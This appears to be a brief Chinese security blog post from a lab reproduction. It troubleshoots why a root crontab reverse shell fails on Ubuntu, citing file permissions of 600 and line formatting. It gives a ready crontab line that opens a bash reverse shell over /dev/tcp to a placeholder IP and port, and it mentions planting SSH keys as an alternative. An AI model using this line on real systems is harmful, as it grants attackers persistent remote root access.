在ubuntu中反弹shell问题

  • A+
所属分类:安全文章
有师傅反应说上一篇git 蜜罐复现文章中ubuntu和kali写入了计划任务,还是不能反弹shell。
关于这一点我在做实验时,一开始也是没有反弹shell,我手动编辑了几遍root文件,具体弹shell的代码并没有改变,然后就莫名其妙的弹回来了,忙着发文,也就没有再次实验,我的错。

今天又试了好多次,还是弹不回来,终于找到了原因,这东西就是ubuntu系统的原因,root文件的权限必须为600,还有就是弹的代码也有点问题,这是原文链接:


https://m3lon.github.io/2019/03/18/%E8%A7%A3%E5%86%B3ubuntu-crontab%E5%8F%8D%E5%BC%B9shell%E5%A4%B1%E8%B4%A5%E7%9A%84%E9%97%AE%E9%A2%98/


shell不能反弹,可以写ssh公钥等,最后他给的弹shell代码好像还有点问题,在代码前后空一格,写入换行符,

*/1 * * * * bash -c "bash -i >&/dev/tcp/xx.xx.xx.xx/8888 0>&1"




免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。

在ubuntu中反弹shell问题

来都来了,不关注一波?

本文始发于微信公众号(谁不想当剑仙):在ubuntu中反弹shell问题

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: